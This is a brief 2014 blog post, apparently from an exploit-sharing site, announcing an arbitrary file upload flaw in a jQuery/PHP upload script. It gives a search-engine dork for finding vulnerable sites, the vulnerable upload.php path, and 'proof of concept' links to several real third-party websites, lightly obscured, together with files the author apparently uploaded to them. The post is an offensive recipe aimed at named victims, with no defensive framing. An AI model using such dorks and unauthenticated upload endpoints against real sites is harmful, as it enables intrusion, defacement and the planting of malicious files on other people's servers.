Chủ Nhật, 3 tháng 8, 2014

jQuery PHP Arbitrary Upload

Dork:

"Upload dinâmico com jQuery/PHP"
Exploit :
http://site/patch/upload.php 
POC:

http://www.agendXavisual.com/php/uploads_multiplos_1_modific/upload.php
http://www.agenXdavisual.com/php/uploads_multiplos_1_modific/uploads/e3b334538b7fc18a74286412bc388010.txt

http://lagodoy.nXo-ip.biz/projetos/lagodoy/upload_dinamico/upload.php
http://lagodoyX.no-ip.biz/projetos/lagodoy/upload_dinamico/uploads/03cd4c9a05c8b2a4b2ede68a7b4a5fdb.txt

http://estatisXtica.br/caem/mostra2013/formularios/upload_comprovante.php
http://estatiXstica.br/caem/mostra2013/formularios/uploads/573437f23846bacf89c7e37193cfd224.txt



Không có nhận xét nào:

Đăng nhận xét